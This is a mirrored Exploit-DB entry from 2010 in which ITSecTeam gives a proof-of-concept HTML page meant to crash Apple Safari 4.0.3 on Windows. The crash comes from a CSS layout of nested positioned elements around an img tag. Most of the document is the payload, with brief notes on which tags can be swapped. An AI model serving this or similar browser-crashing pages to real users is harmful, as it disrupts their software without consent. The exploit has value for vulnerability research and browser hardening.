Apple Safari 4.0.3 (Windows x86) – ‘CSS’ Remote Denial of Service (2)

  • 作者: ITSecTeam
    日期: 2010-04-29
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12457/
  • ===============================================================
    Apple Safari 4.0.3 (Win32) CSS Remote Denial Of Service Exploit
    ===============================================================
    ################## In The Name Of Allah ########################
    #Apple Safari 4.0.3 (Win32) CSS Remote Denial Of Service Exploit
    #Tested on Safari 4.0.3.0 (4.531.9.1)
    #vendor : http://www.apple.com/safari
    #AUTHOR: ITSecTeam
    #Email: Bug@ITSecTeam.com
    #Website: http://www.itsecteam.com
    #Forum : http://forum.ITSecTeam.com
    #Original Advisory:
    #http://www.itsecteam.com/en/vulnerabilities/vulnerability49.htm
    #Special Thanks: b3hz4d,M3hr@n.s,Cdef3nder,PLATEN
    ################################################################
    
    <html dir="rtl">
    <body>
    <style type="text/css">
    .crash {
    position:relative;
    padding: 4px 6px;
    display:inline-block;
    }
    .crash img {
    position:absolute;
    }
    </style>
    <div class="crash">
    <P><img></p> you can replace <p> tags with any other tags, but you
    shouldnt change <img> tag
    </div>
    </body>
    </html>